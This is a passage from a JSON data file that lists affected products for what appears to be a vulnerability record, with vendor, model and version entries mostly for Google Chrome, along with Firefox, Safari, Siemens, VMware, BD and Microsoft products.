        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1043.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1000.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "46.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.19"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.317"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.204"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.909.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.14"
      },
      {
        "_id": null,
        "model": "simatic ipc477e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.318"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.96"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.936.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.488.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.526.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.808.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.287.0"
      },
      {
        "_id": null,
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.6"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "28.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.584.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1042.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.907.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.120"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "25.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.29"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.108"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.25"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.823.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.791.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.577.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.91"
      },
      {
        "_id": null,
        "model": "simatic ipc347e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.676.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.210"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.525.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.681.0"
      },
      {
        "_id": null,
        "model": "viper lt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "pyxis procedurestation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.0"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.309"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.97"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.214"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1050"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.135"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.11"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.4"
      },
      {
        "_id": null,
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.4419.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.416.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.950.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.8"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.613.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.32"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.182.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.0"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.163"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.304"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.162"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.305"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.464.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.682.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.940.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.22"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1683.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.151"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.376.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1025"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.921.3"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.10"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.54"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.155"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.538.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.519.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1041.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.69"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.1"
      },
      {
        "_id": null,
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.561.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.586.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.93"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.766.0"
      },
      {
        "_id": null,
        "model": "simatic ipc677c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.28"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.34"
      },
      {
        "_id": null,
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.740.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.125"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.50"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.45"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "4.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.399.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.203"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.126"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.830.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.131"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.1"
      },
      {
        "_id": null,
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.925.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.864.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "_id": null,
        "model": "chrome",
